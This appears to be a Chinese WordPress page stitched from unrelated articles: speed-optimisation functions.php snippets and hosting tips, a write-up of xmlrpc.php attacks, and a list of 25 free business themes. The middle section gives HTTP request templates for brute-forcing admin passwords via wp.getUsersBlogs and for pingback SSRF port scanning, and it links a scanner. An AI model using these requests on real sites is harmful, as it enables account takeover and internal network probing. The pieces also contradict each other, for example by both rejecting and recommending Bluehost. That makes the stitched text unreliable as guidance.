2020-07-30 17:27:31 分类：建站实操

我们很多网友，尤其是很多WordPress新手会发现自己在使用这款程序建站的时候为什么网站打开速度很慢，而有些网友即便数据和图片比较多网站打开速度也是比较快的，甚至你们都是使用的同一家的服务器。这个就在于我们在使用WordPress的时候是否有对于代码基础优化，当然如果深度优化是需要一些技能的，但是基础的优化我们大家都会做。

在这篇文章中，我们老部落整理几个常用的入门可以提高网站速度和代码优化效率的模块。如果我们是新手WordPress可以添加到网站中然后使得网站效率。

第一、网站目录反斜杠

//~ 页面链接后添加反斜杠
function itbulu_nice_trailingslashit($string, $type_of_url) {
if ($type_of_url != 'single')
$string = trailingslashit($string);
return $string;
}
add_filter('user_trailingslashit', 'itbulu_nice_trailingslashit', 10, 2);

添加这个脚本可以使得网站目录后缀URL加上反斜杠，默认是没有的。比如：https://www.laobuluo.com/tutorials/solution/。

第二、禁止emojis

//禁止emojis Edit By laobuluo.com
function disable_emojis() {
remove_action( 'wp_head', 'print_emoji_detection_script', 7 );
remove_action( 'admin_print_scripts', 'print_emoji_detection_script' );
remove_action( 'wp_print_styles', 'print_emoji_styles' );
remove_action( 'admin_print_styles', 'print_emoji_styles' );
remove_filter( 'the_content_feed', 'wp_staticize_emoji' );
remove_filter( 'comment_text_rss', 'wp_staticize_emoji' );
remove_filter( 'wp_mail', 'wp_staticize_emoji_for_email' );
add_filter( 'tiny_mce_plugins', 'disable_emojis_tinymce' );
}
add_action( 'init', 'disable_emojis' );
function disable_emojis_tinymce( $plugins ) {
if ( is_array( $plugins ) ) {
return array_diff( $plugins, array( 'wpemoji' ) );
} else {
return array();
}
}

一般网站用不上emojis，我们可以禁止。

第三、去掉CSS/JS后缀版本号

//去除加载的css和js后面的版本号 Edit By laobuluo.com
function sb_remove_script_version( $src ){
$parts = explode( '?', $src );
return $parts[0];
}
add_filter( 'script_loader_src', 'sb_remove_script_version', 15, 1 );
add_filter( 'style_loader_src', 'sb_remove_script_version', 15, 1 );

第四、禁止自PING和版本保存

function no_self_ping( &$links ) {
$home = get_option( 'home' );
foreach ( $links as $l => $link )
if ( 0 === strpos( $link, $home ) )
unset($links[$l]);
}
add_action( 'pre_ping', 'no_self_ping' );
remove_action('pre_post_update', 'wp_save_post_revision');
add_action('wp_print_scripts', 'disable_autosave');
function disable_autosave() {
wp_deregister_script('autosave');
}

第五、部分头部禁止模块

remove_action( 'wp_head', 'wp_generator' );
remove_action( 'wp_head', 'parent_post_rel_link', 10, 0 );
remove_action( 'wp_head', 'start_post_rel_link', 10, 0 );
remove_action( 'wp_head', 'adjacent_posts_rel_link_wp_head', 10, 0 );
remove_action( 'wp_head', 'feed_links_extra', 3 );
remove_action( 'wp_head', 'feed_links', 2 );
remove_action( 'wp_head', 'rsd_link' );
remove_action( 'wp_head', 'wlwmanifest_link' );
remove_action( 'wp_head', 'index_rel_link' );
remove_action( 'wp_head', 'wp_shortlink_wp_head', 10, 0 );

第六、将JQ文件底部加载

//强制jquery库文件底部载入 Edit By laobuluo.com
function ds_print_jquery_in_footer( &$scripts) {
    if ( ! is_admin() )
        $scripts->add_data( 'jquery', 'group', 1 );
}
add_action( 'wp_default_scripts', 'ds_print_jquery_in_footer' );

底部加载可以提高网站打开速度。

第七、关闭XML-RPC

// 关闭 XML-RPC 功能  Edit By laobuluo.com
add_filter('xmlrpc_enabled', '__return_false');

第八、关闭REST API

// 屏蔽 REST API
add_filter('rest_enabled', '__return_false');
add_filter('rest_jsonp_enabled', '__return_false');

第九、移除头部JSON

//移除头部 wp-json 标签和 HTTP header 中的 link Edit By laobuluo.com
remove_action('wp_head', 'rest_output_link_wp_head', 10 );
remove_action('template_redirect', 'rest_output_link_header', 11 );

第十、禁止Gutenberg编辑器

//禁止Gutenberg编辑器
add_filter('use_block_editor_for_post', '__return_false');
remove_action( 'wp_enqueue_scripts', 'wp_common_block_scripts_and_styles' );

总结，我们可以根据上面的功能将代码加入到当前WP主题的Functions.php文件中。

1、选择优质的托管服务

当用户访问您的站点时，托管服务器将决定信息传递给他们的速度。有些服务器速度很慢，或者，您的套餐可能会限制您的最大速度或允许的服务器资源。简而言之，您的站点永远不会比服务器允许的速度快。选择正确的托管服务器和主机套餐是您应该为网站做出的首要选择之一，也是最重要的选择。

打个比方，电脑运行速度和性能，取决于硬件配置，比如CPU、内存、硬盘等，如果这些硬件配置都比较低，你用什么优化手段都不可能有显著的性能提升。以下是倡萌的建议：

国内网站：

建议购买 阿里云、腾讯云 等国内大厂的产品，如果资金允许，不要购买“突发型”“限制型”“10%CPU性能”等等字样的产品，这就是硬件限制，磁盘最好选择SSD固态硬盘、CPU最好是2核或以上、带宽至少2M或以上。反之，没钱的话，那就自己看着来吧！限制型服务器或主机空间运行一个小型网站也是可以的。

外贸网站：

建议购买 SiteGround（ https://www.siteground.com ） 的WordPress管理型主机，他们是WordPress官方推荐的，并且针对WordPress进行了很多优化，可一键申请SSL免费证书和开启CDN。管理型 WordPress主机商还可以考虑 Kinsta、WP Engine 或 Godaddy，不过这些价格上有些贵。

注：不要买 BlueHost 了，被别人收购后，变得非常垃圾。

重要建议：

除了选择托管商以外，对产品的选择还要考虑以下因素：

• 选择Linux主机，不要用windows！
• 选择提供 PHP 7.0 以上的（如果能提供PHP 7.2 或以上的，性能会更好）
• 选择MySQL 5.6 以上的（好像阿里云的虚拟主机有些数据库还是 MySQL 5.1 ，请不要购买这种主机！）
• 如果网站有一定的流量（比如日IP > 1000），建议不要用低配虚拟主机了，可以考虑升级使用云服务器（需要配置环境和维护的，可以联系倡萌）

2、定期更新WordPress内核、插件和主题

无论更新是WordPress核心，还是WordPress主题或插件，都请尽可能去做。这样做的最重要原因是安全性，因为更新将确保您的网站不受最新威胁的侵害。

• 为什么您的WordPress网站会容易被黑客攻击

3、使用缓存机制

WordPress网站优化的另一种方法是实施缓存。这样别人访问页面的时候，可以直接提供缓存页面和数据，减少了运行站点所需的服务器资源占用，从而可以大大加快站点的运行速度。推荐以下缓存插件：

• W3 Total Cache（老牌免费缓存插件）
• WP Rocket (非常棒的收费缓存插件，WordPress大学目前用的)
• WP Fastest Cache （值得推荐）
• LiteSpeed Cache （值得推荐）
• WP Super Cache （老牌免费缓存插件， 建议配合 Autoptimize 一起用 ）

这几年出现了很多缓存插件，而且安装数量都非常多，大家可以根据自己的需要去对比一下。以上都非常不错！

如果是VPS或云服务器（内存1G以上），建议使用 Opcache 和 Memcached 服务器端缓存，性能更佳！

4、图像优化

图像优化是在不明显影响图像质量的情况下压缩图像文件大小的过程。大文件大小会对加载时间和带宽使用产生负面影响，从而损害整体用户体验。可以考虑以下图片处理插件：

• ShortPixel
• Smush
• Imagify（貌似看到过Google官方推荐，WordPress大学目前在用）

5、减少HTTP请求数和压缩大小

页面加载的文件（css、js、图片等）都会导致请求数的增加，倡萌建议先删除或禁用不必要的js和css，然后合并压缩js和css，并且使用LazyLoad延迟加载图片。 除了减少HTTP请求数以外，压缩html、启用Gzip、延迟加载不是必要的css和js也是不错的优化手段。上面推荐的缓存插件基本都内置的这方面的功能，如果没有这方面的功能，可以使用 Autoptimize 插件。需要注意的是，这些操作可能会导致网站出现错位等问题，所以我们应该小心调试和排除一页页面和文件。

关于删除或禁用不必要的js和css，可以参考这方面的教程：

• 详解WordPress主题开发中添加CSS样式和Javascript脚本
• 正确加载 Javascript 和 CSS 到 WordPress
• 正确加载 CSS 到 WordPress
• 移除 WordPress 加载的JS和CSS链接中的版本号

倡萌最近优化的网站项目，使用的是 Bridge 收费主题，加载了100+个js文件和30个css文件，最终倡萌剔除了 75+ 个 js和 20 个 css。

6、使用CDN加速

CDN指遍布全球的代理服务器网络。每个服务器都包含您的网站的副本，可用于将您的内容更快地交付给全球范围内的用户。这不仅可以提高您网站的速度，还可以提高安全性。对于有一定流量的网站来说，CDN方案是个不错的选择。

国内大厂主机商，比如阿里云、腾讯云、百度云等，都提供了CDN服务，可以根据需要自己选择使用。国内免费CDN可以考虑百度云加速，国外可以考虑 Cloudflare（可以安装 Cloudflare 插件）。

如果仅仅是加速静态文件，比如图片、js和css等，也可以考虑使用 又拍云、七牛云 等服务。

WordPress大学 目前用的是阿里云服务器，所以配套用了OSS+CDN服务加速静态文件，效果还不错，就是需要一定的费用。

总结

WordPress网站的性能和速度对网站至关重要，通过检测工具检测出网站的问题，然后配合上面的WordPress网站优化建议去操作，应该可以得到一个不错的结果！网站优化是一个长期的实施过程，WordPress大学也需要不断优化提升！

WordPress采用了XML-RPC接口.并且通过内置函数WordPress API实现了该接口内容。 所以，你可要通过客户端来管理Wordpress。 通过使用WordPress XML-RPC, 你可以使用业界流行博客客户端Weblog Clients来发布你的WordPress日志和页面。同时，XML-RPC 也可使用extended by WordPress Plugins插件来自定义你的规则。

0X01 激活XML-RPC

从3.5版本开始，XML-RPC功能默认开启。 早些版本，可通过如下方法激活：Settings > Writing > Remote Publishing and check the checkbox.

路径：http://example.com/wordpress/xmlrpc.php

image.png

0x02 查看系统允许的方法

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

image.png

0x03 账号爆破

一般情况下，wordpress的管理后台都会设置账号登录失败次数限制，因此，可以通过xmlprc.php接口来进行爆破。通常会使用wp.getUserBlogs、wp.getCategories和metaWeblog.getUsersBlogs这个方法来进行爆破，也可以使用其他的方法。
构造请求包：

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

image.png

爆破成功会返回博客的内容：

image.png

0x03 SSRF

WordPress 版本< 3.5.1
通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery，SSRF)和远程端口扫描。
构造请求包：

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探测的ip和端口：http://127.0.0.1:80</string></value>
</param><param><value><string>网站上一篇博客的URL：http://localhost/wordpress/?p=1)<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

IP和端口存在，返回包中的<value><int>中的值大于0：

image.png

利用脚本：
https://github.com/FireFart/WordpressPingbackPortScanner 

0x04 读取文件：

image.png

image.png

0x99 参考：

https://codex.wordpress.org/zh-cn:XML-RPC_Support
http://xmlrpc.com/
https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
https://www.acunetix.com/blog/web-security-zone/wordpress-pingback-vulnerability/
http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html

为什么要支持webp图片呢？因为webp实在太吊了，可以把图片无损压缩成只有原来一半或以下大小的图片文件，主机吧的一个微信公众号图片4MB的，转换成webp的大小只有28KB！

WordPress是制作商务网站的最受欢迎的网站构建器。

有两种可用的WordPress网站。WordPress.com是受限制的托管平台，而WordPress.org是您听说过的流行WordPress平台。

相关： WordPress.com与WordPress.org之间的区别（完全比较）

我们建议您在网站上使用自托管的WordPress.org。它使您可以立即使用所有WordPress功能。

要建立网站，您需要获取域名和虚拟主机。

域名是用户将在其浏览器中键入以访问您的网站的网站地址（例如wpbeginner.com）。另一方面，网络托管是您存储所有网站文件的位置。

我们建议使用Bluehost，因为它们是世界上最大的托管公司之一，也是官方推荐的WordPress托管提供商。

有关更多建议，请参见有关如何选择最佳WordPress托管的指南。

购买虚拟主机后，您可以按照我们的指南制作商业网站，以逐步进行设置说明。

话虽如此，让我们看一下您可以使用的一些最佳免费WordPress商业主题。

1.阿斯特拉

Astra是一个流行的多功能WordPress主题。它带有数十个入门站点，包括用于商业网站的多个演示。

它是完全可定制的，并使其非常容易更改其颜色，背景，字体和其他选项。Astra与任何首页构建器都可以很好地协作，这使得在需要时更容易创建自己的自定义布局。

2. OceanWP

OceanWP是一个免费的WordPress商业主题，旨在制作任何类型的网站。它带有几个预先构建的演示，您可以使用它们来快速启动您的企业网站。

主题是电子商务，只需单击几下即可开始建立在线商店。它具有最快的页面加载时间和内置的SEO功能，可提高您的网站流量。

3.尼芙

Neve是适用于小型企业网站和电子商务商店的轻量级WordPress多功能主题。

它具有极简主义的布局，拥有漂亮的色彩和先进的排版。它与流行的页面构建器（例如Beaver Builder）集成在一起，可轻松自定义。

4.古腾主题

Guten主题是适用于Gutenberg的WordPress主题，可用于创建您的商业网站。它带有对额外的Gutenberg块的支持，您可以使用这些块为网站构建漂亮的布局。

它也可以与拖放页面构建器一起使用，从而为您提供更多自定义选项。它针对速度和性能进行了高度优化。

5.悉尼

悉尼是一个强大的WordPress商业主题。它带有全角图像滑块，自定义徽标，无限的颜色选项以及对所有Google字体的访问权限。其他值得注意的功能包括粘性导航菜单，标题图像和视差滚动。

6.着迷

Mesmerize是为商业网站构建的超灵活的WordPress多功能主题。它是初学者友好的，并提供大量选项，使您无需编写任何代码或CSS即可创建网站。主页具有商业网站设计，其中包括5种标题样式和30多个现成的内容部分。它还支持视频背景，幻灯片，标题内容类型，渐变叠加等。

7.泽勒

Zelle是一页的WordPress主题，设计用于商业网站的专业布局。它具有视差滚动，自定义背景，大型菜单和一键式演示内容导入器，可以立即开始使用。Zelle主题还与所有流行的页面构建器兼容，以帮助您轻松创建自定义页面模板。

8.便当

Bento是一个用户友好的WordPress主题，具有多个专业布局，包括用于您的企业网站的模板。

它具有多个页面模板，自定义小部件，矢量图标，无限的颜色组合和Google字体等功能。您可以使用WordPress定制程序通过实时预览来自定义您的网站。

9.赫斯提亚

Hestia是免费的WordPress主题，非常适合商业网站。它带有一个配套插件，可在首页上添加客户推荐和服务部分。

它与流行的页面构建器插件兼容，并为WooCommerce提供开箱即用的支持。使用实时主题定制器可以轻松设置Hestia。

10.富裕

Affluent是一个非常适合公司和企业网站的免费WordPress主题。它以最小且专业的布局，为首页滑块，内容块和推荐旋转器提供了自定义帖子类型。它与流行的WordPress插件（如Yoast SEO，WooCommerce和WPML）集成，以扩展功能。

11. Foodica

如果您正在为食品相关业务寻找免费的WordPress主题，那么Foodica将是一个完美的选择。它具有白色背景的宽敞布局，可弹出您的内容和图像。

此主题在主页上具有多个导航菜单，图像滑块，社交共享图标和特色内容部分。使用WordPress实时定制器很容易进行定制。

12.前卫

Avant是一个免费的现代WordPress商业主题，可快速制作具有专业外观的网站。它使您可以完全控制选择页面和博客的布局。

您还可以自定义布局设置，以调整页眉，页脚和小部件区域中的间距。它支持多种语言，开箱即用地支持WooCommere。

13.总计

Total是用于商业网站的美丽且免费的WordPress主题。它具有灵活的主页布局，其中在不同区域添加了滑块，联系表，进度栏，项目组合，团队部分，推荐书和博客部分。

它包括多个可用于小部件的区域以及对更改主题设置的完全定制器支持。它还支持WooCommerce，可用于创建多语言网站。

14.休曼

Hueman是一个免费的多功能WordPress商业主题。它是高度可定制的，并带有易于使用的选项面板。它具有多种布局选择，包括单列，两列或三列布局。Hueman提供了两个导航菜单位置以及主题中内置的社交媒体菜单。

15.波塞冬

波塞冬（Poseidon）是一个最小的WordPress主题，具有漂亮的宽敞布局。它可以用作简单的博客主题，商业网站，甚至可以用作在线杂志。它允许您使用自定义窗口小部件构建主页布局。您可以使用WordPress主题定制器来更改颜色，字体和背景。

16. Customizr

Customizr是最流行和高度可定制的WordPress商业主题之一。它具有充分的响应能力和移动友好性。它带有一个精选的滑块，​​多个页面模板，布局选择和颜色。该主题具有引人入胜的全角自定义背景图片，给人留下深刻的第一印象。

17.制作

Make是具有拖放功能的页面生成器友好WordPress主题，可让您快速构建企业网站。它具有多种布局选择和完全响应的设计。它还包括全幅横幅和图像画廊，以展示您的业务组合。

18.优势

Vantage是一种免费且灵活的WordPress商业主题，几乎可以用于任何类型的网站。使用页面构建器插件可以高度自定义。您可以使用拖放功能快速自定义布局。

它针对性能进行了优化，也可以用于电子商务网站。

19.卡洛韦

Colorway是一种时尚的WordPress商业主题，具有易于使用的功能和选项。它具有自定义背景，多种布局选择，Google Analytics（分析）支持等。您还可以导入演示内容以设置主题，然后替换文本和图像以立即开始使用。

20.顶峰

Pinnacle是一个大胆的WordPress主题，提供具有完全响应式布局的平面设计。它具有带有自定义徽标和导航菜单的全角标题背景图像。品尼高还支持WooCommerce将您的业务站点扩展到电子商务商店。

21.宽敞

Spacious是一个免费的WordPress商业主题，其布局简约而清新。它带有图像滑块，自定义窗口小部件和特色内容的主页部分。

它还包括盒装和宽大的布局选择，博客页面模板以及其他几种页面布局。您可以为网站选择较浅或较深的配色方案，并将其与您选择的任何页面构建器插件一起使用。

22.莫西西亚

Moesia是具有完整视差支持的响应式WordPress商业主题。它带有预定义的块，您可以使用它们来构建主页。每个块可以具有自己的视差背景，从而为您的用户创造美好的体验。

23.雕刻精简版

Engrave Lite是一个功能强大的WordPress商业主题。它在主页上展示了全角图像滑块和自定义部分。

它具有多个导航菜单，可用于小部件的区域，对电子商务插件的支持以及简单的自定义选项。它可以快速设置而不会遇到太多选择。

24.全画幅

顾名思义，Full Frame是用于商业网站的全角WordPress主题。它带有内置的特色内容滑块，号召性用语按钮，自定义小部件和多个页面布局。

该主题支持WooCommerce将您的企业网站转换为在线商店。

25.最小风

Minamaze是最小的WordPress商业主题。它具有背景，字体和边框的黑白组合。该主题有一个全角滑块，2个导航菜单和一个自定义徽标。SEO进行了高度优化，以增加您的网站流量。